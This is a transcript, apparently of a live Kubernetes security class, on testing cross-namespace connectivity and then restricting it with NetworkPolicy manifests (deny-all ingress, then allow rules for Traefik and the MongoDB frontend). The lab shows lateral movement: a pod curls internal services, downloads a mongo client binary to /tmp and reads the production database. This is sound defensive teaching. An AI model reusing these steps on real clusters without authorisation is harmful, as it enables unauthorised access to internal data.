Okay, so what we're seeing here is that,
at least until this moment,
the no-sql-client,
this one,
is able to see this one,
and this one is able to see everyone, yep?
So let's try the following.
From the web console,
I'm going to,
to access the other services.
So if you take a look
at our installation,
it seems that, as there is so much
stuff, I think that we need that.
Yeah.
Let me show you something.
We can see that here.
So let's go to the dashboard,
and,
and, and, and,
let me see.
Oh yeah.
So this is the Prometheus server,
and we're looking for the host name.
I want to show you,
but I can't see it.
Well, we will need to build the name.
This is the, that's in the base dashboard.
I mean, it's not that good.
So anyway,
with curl, which is here,
we can access
that from this server.
So the Prometheus name,
then the namespace, monitoring,
and the rest is the standard: service,
cluster, local.
So if I execute a curl,
well, it just says
not found, so I can reach it.
So the thing is that we are testing the connection
between,
between the namespace default,
and our friend in the namespace monitoring.
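Roughly the in-cluster DNS name being assembled here; the service name prometheus-server is an assumption based on the deployment list:

    curl http://prometheus-server.monitoring.svc.cluster.local
    # any HTTP answer at all (even a 404) proves the two namespaces can talk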
Now let's try with the,
with the kube-system namespace.
So again, with curl.
Okay.
Let me see it here, which one is it.
So in deployments,
there is,
I didn't see it.
Okay, it's here.
This is the Traefik metrics service,
which is, like, the service exposed
so that Prometheus can scrape the metrics
that it needs to gather, to monitor all the stuff.
So this is the Traefik metrics service, and kube-system is the,
is the place,
the namespace.
So the Traefik metrics service name,
dot,
kube-system,
dot service,
dot cluster,
dot local,
and the port here is 9100.
And let's check here.
You can see here.
Okay.
Let's see it like this.
There is nothing here.
So we go to /metrics,
and these are,
these are all the metrics that Prometheus scrapes
and saves.
Actually we can take a look here,
traefik.
It shows us these, these are the,
actually, we can see how,
how it works.
So we have connected,
from the web console,
to Traefik in kube-system and to monitoring.
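A sketch of that cross-namespace call; the service name traefik-prometheus is an assumption, the namespace and port 9100 follow what is shown on screen:

    curl http://traefik-prometheus.kube-system.svc.cluster.local:9100/metrics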
We are missing production.
So let's try connect to production.
So in order to do that,
we are going to connect to the database directly.
So we are going to rewind here.
So in order to do that,
we are going to install some software,
the Mongo client.
So I'm going to paste the,
the commands here for you.
With Control-B,
you're able to,
to paste it in there.
Yeah.
For something that I just,
so,
it's,
it's very good.
With Control-B.
Okay.
Perfect.
It works for you too.
And now we are going to,
we are going to,
to execute,
to move,
move the binary
to /tmp.
And now we're going to execute this
Mongo client
to access the database.
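A hedged sketch of what those pasted commands do: fetch a mongo client, drop it in /tmp, and connect straight to the database in production. The download URL and the service name mongodb are assumptions, not the exact ones used in class:

    # illustrative only: download a standalone mongo shell binary and make it executable
    curl -L -o /tmp/mongo <mongo-client-download-url>
    chmod +x /tmp/mongo
    # connect across namespaces via the service DNS name
    /tmp/mongo "mongodb://mongodb.production.svc.cluster.local:27017"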
Okay.
Okay.
And it works because we are seeing the R2D2
and all the,
all the objects,
the JSON objects that are stored there.
Okay.
Okay. Perfect.
So,
okay.
So now we have established
that we do have connectivity with all the
namespaces.
So we are ready to create our first network policy.
So let's go here.
So,
let's go again to the,
because we are going to modify the files,
so the best thing that we can do is to go
and copy the network policies
from our labs directory.
So the k8s-security path,
labs,
and the network,
the network policies.
Let me copy this for you.
And go inside that directory,
and open Visual Studio Code there,
code, space, dot.
Okay.
You are on the last one, yes.
Perfect.
Okay. Awesome.
So let's open the file,
ingress-production-deny-all.
So this is our policy,
super simple.
It's,
it's the,
okay.
The apiVersion is networking v1,
the kind of object is NetworkPolicy.
The metadata gives the name
and the namespace
to which this policy is being applied.
The specification is this one:
podSelector and ingress.
So what this,
this means is that it will choose any pod
that matches this,
this filter, this expression.
And as the expression is blank, is empty,
it will match everything.
Yeah.
And ingress,
these will be like the rules that allow traffic,
the traffic to reach the pods selected by this,
by this pod selector.
Actually, I said that in a confusing way.
The selector is empty, so it selects all the pods.
And these ingress rules are empty.
So there are no,
there is not going to be,
there is not any,
there is no rule
that allows the traffic to enter.
Yeah.
So this, this,
what this policy does at the end
is to block the traffic
that comes into the production namespace.
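Based on how the file is described, this is essentially the classic default-deny-ingress recipe; the metadata name here is approximate:

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: ingress-production-deny-all
      namespace: production
    spec:
      podSelector: {}    # empty selector: applies to every pod in the namespace
      policyTypes:
      - Ingress          # no ingress rules listed, so no inbound traffic is allowed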
So we're going,
inside the Visual Studio Code,
go to terminal and open any terminal.
We're going to do it from there.
We're going to apply that policy from there.
So it's,
it's easier to see what we are doing.
So, kubectl apply.
Oh, before applying,
let's execute get netpol,
all namespaces.
But there is, there is no network policy yet.
There are no network policies yet.
And now we are going to apply this policy.
Apply,
dash f,
the one for ingress production deny,
the netpol.
And let's see, it should show up.
Yeah, it's there.
Mm-hmm.
It doesn't have that part.
It's 1-ingress-production-deny.
No, I wasn't in the correct directory.
Ah, yeah, okay.
That is right.
Actually, yeah.
Awesome.
And run the get netpol again.
And it should be there.
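The two commands being run, with an approximate file name; your copy of the lab may name it slightly differently:

    kubectl get netpol --all-namespaces
    kubectl apply -f 1-ingress-production-deny-all.yaml
    kubectl get netpol -n production   # the new policy should now be listed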
Let's go to the dashboard and see.
Here it is.
So in the dashboard,
at the end, you will see network policies in cluster.
Oh, I lost the pink one.
Yeah, so network policies.
Go to clusters, network policies.
Yeah.
And go inside,
and it doesn't show much.
You can just see that.
And let's try.
Let's try to see.
Let's go to Traefik.
Let's reload.
So it doesn't seem,
it seems the same as before,
from here at least.
Let's go to the no-sql-client,
and check if you can execute a query.
So it kind of gets stuck.
So let's reload the no-sql-client.
And it shows that it's not connected.
Reload the webpage.
Okay.
Try to connect again.
Yeah.
So it gets stuck,
and it shows a gateway timeout.
Yeah.
Click on the connect button at the top right.
Okay, yeah, we got it.
And if we go to Prometheus,
and try to execute the Mongo connections query,
let's see.
Well, it is the same with Prometheus,
it needs to be restarted, I think,
for this to take effect.
Let's try again.
I mean, Prometheus,
it's not respecting the policy yet.
So we can restart it,
just to force it,
so that it respects it there.
There it goes, so let me restart it.
Let's see if it applies.
It takes a while sometimes.
Okay.
And in the meantime,
let's go to our web console.
And let's try to connect again to the database.
We have the, in the Q3, we have the points, so.
We just need to.
Okay.
So it should show a connection failure.
Yeah, should we try it on this again?
Yeah, we can try.
No, not yet.
All right, it keeps.
Yeah, it's still really,
we may have to restart the other containers.
But the one that I want you to check
is from web console,
try to execute the query to the MongoDB.
Yeah, I tried that.
Okay, perfect.
And let's try the curl. MongoDB is in production,
and the policy that we applied was only for production.
So let's try with curl.
The Prometheus and the Traefik ones should work,
as well as the,
and we can execute another curl again,
to the no-sql-client as well.
From your side.
Yeah.
You can add slash metrics to that curl.
Yeah.
So it shows you more information.
And let's try to access the no-sql-client,
the no-sql-client.
Yeah, it should be,
it should be something like no-sql-client,
production, service cluster local.
We didn't do this one before.
Yeah.
So.
So this is restricting everything,
and now we can be less restrictive about
which pods can talk.
Yeah, exactly.
We are going to, well, we are not going to finish
all the policies today, but we are going to add one more.
Because right now, if you notice, we have,
I mean, our application is not working.
Because our application should be,
the idea is that we want
the application to be accessible.
Correct.
So actually let's do that.
So let's open the ingress production
allow-traefik-no-sql-client one.
Because what is happening?
We created a policy that blocks
all incoming traffic to production.
So Traefik is not able to reach the no-sql-client.
The web console is not able to access any of those.
And this is okay, actually.
We don't want the web console to access these.
But we do want Traefik to have access.
Actually, we don't want Traefik to access MongoDB.
We want Traefik to access the no-sql-client, specifically.
Which is the front end, right?
Yeah.
So let's do that.
So the second policy, the ingress production
allow-traefik-no-sql-client.
Let's take a look.
So the name, the namespace, and here it comes,
the specification.
podSelector, matchLabels, no-sql-client.
And if we take a look here at the dashboard,
it's podSelector, matchLabels, right?
So podSelector, matchLabels.
So this is our pod, the no-sql-client.
And you can see the labels, it's here.
The label is run: no-sql-client.
Okay.
Yeah, so this is the way I match that pod.
Right?
Now, for ingress, what you just asked:
which ports am I going to allow access to.
So we want port 3000, because if we take a look
here in services, the no-sql-client,
let's see,
it's here, it's port 3000.
Okay.
So when we didn't specify the port in the ingress,
it would allow all the ports, any port.
So wasn't that port 80?
Or was it still 3000?
No, actually no, because what we were accessing there
is the Traefik Ingress controller.
Okay.
And Traefik is redirecting that.
Got it.
Yeah, yeah, yeah, okay.
Understood.
And what else?
I think that's it.
And.
And from, okay, so now we are specifying
where the traffic is coming from.
Because, I mean, we want production
to be able to receive incoming traffic,
but we only want that incoming traffic
to come from this application, Traefik,
which is in the namespace kube-system.
So we say here: from, namespaceSelector,
matchLabels, namespace: kube-system.
So if we go here to the dashboard, to namespaces,
I think here is the label, namespace: kube-system, right?
So just imagine a namespace
with a label for development or QA or production or whatever.
So the labels are like a way to manage
all these kinds of policies and rules.
And once we select the namespace,
we select which pod we want.
In this case it's Traefik, app: traefik.
So we go there, the pod, the pod selector.
So I think it's somewhere around here.
It's here, Traefik, app: traefik, right?
Yeah.
And that's it.
That's it.
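Putting that description into YAML, roughly; the labels and names follow what is read off the dashboard, so treat them as approximate:

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: ingress-production-allow-traefik-nosqlclient
      namespace: production
    spec:
      podSelector:
        matchLabels:
          run: no-sql-client           # the frontend pod
      ingress:
      - from:
        - namespaceSelector:
            matchLabels:
              namespace: kube-system   # only from the ingress controller's namespace
          podSelector:
            matchLabels:
              app: traefik             # and only from the Traefik pods
        ports:
        - port: 3000                   # the no-sql-client service port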
So let's apply this.
Once we apply it we can check,
and we see that it's there.
And let's try.
Let's see if this works for the no-sql-client.
So will this override the denial that we had applied, or?
It will override it, but only for the specific traffic
that comes from the kube-system Traefik
and wants to access the production no-sql-client.
In fact, if you reload, you will see that we can see again
the front end.
Apply it, apply it.
Now let's try to connect to MongoDB.
It's still not working, right?
Because we, I mean, we still have,
we still have the policy that denies
all incoming traffic to production.
We haven't yet allowed the no-sql-client,
the frontend, to reach the backend.
Let's try it from web console.
What do you think it should happen here on web console?
It should still have no connection.
That is right, because we didn't create any,
any rule changing that.
And this is actually something that we may want.
So if you try to execute the MongoDB client,
it will fail.
From the no-sql-client, it will fail as well.
It will time out.
So now we're going to apply,
I mean, we need our application to work, right?
So at least the basics.
So we're going to apply a policy that permits the traffic
from the no-sql-client to Mongo.
And this is the policy.
So again, the namespace will be production.
It will apply to MongoDB, to the pod selector MongoDB.
And it will use the default MongoDB port.
And the originating traffic will come from the pod selector,
no-sql-client.
So this rule, it's allowing, it's, I mean,
we are creating a policy for the namespace production,
for the pod MongoDB, allowing ingress of traffic
directed to the MongoDB port,
originated from the pod selector no-sql-client.
This is what this policy says, right?
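Again as a rough YAML sketch of what is being described; the port and labels are assumptions consistent with the defaults:

    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: ingress-production-allow-nosqlclient-mongodb
      namespace: production
    spec:
      podSelector:
        matchLabels:
          run: mongodb               # the backend pod
      ingress:
      - from:
        - podSelector:
            matchLabels:
              run: no-sql-client     # only the frontend may connect
        ports:
        - port: 27017                # default MongoDB port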
So let's apply that.
kubectl apply, dash f,
and the name of this manifest.
And if we go and check here,
if we try to connect again, it should work.
It worked.
Yeah.
Oh, that's instant.
Yeah, amazing, right?
Okay, so let's wrap up for today.
Tomorrow we will finish these policies,
these network policies,
and move on to the security contexts.
So to work with those and with the role-based access
and the tools and all the other labs.
So do you have any question regarding
what we have discussed today?
And anything that you feel that needs to improve
or change or is the pace right?
No, the pace is right.
Yeah, I think it's just, will these notes
be available somewhere towards the end of the session,
if I want to go back and check them out?
Well, actually, in the repo
there is everything that we are doing.
So the idea is that you can clone that
and the PDF is there, the presentation as well.
So, and there is actually, now that you say that,
I will suggest you to do this,
what we are going to do here,
to save the history of everything that we have done so far.
So you can copy that afterwards and take it with you.
So let's exit, close all the consoles.
And in here, exit.
Because there is one bad thing: the servers
are automatically powered off later in the night.
Okay.
So that affects us.
So once you have exited all the terminals,
open up the console again
and run history.
If you want the history, you can save it
wherever you want to save it.
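One simple way to do what is being suggested; the output path is just an example:

    history > /tmp/day1-history.txt   # pick any file name and location you like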
Tomorrow we can take a...
Actually, I'm going to save it in the zip.
It saves the dates, so it works that way as well.
Okay.
Perfect.
So, Kiriti, have a good evening.
Enjoy your Australian weather.
And I'll see you tomorrow.
All right, thank you.
Thank you, have a great one.
You too, goodbye, have a good night.
Bye-bye.                

Recorded on 2022-11-21
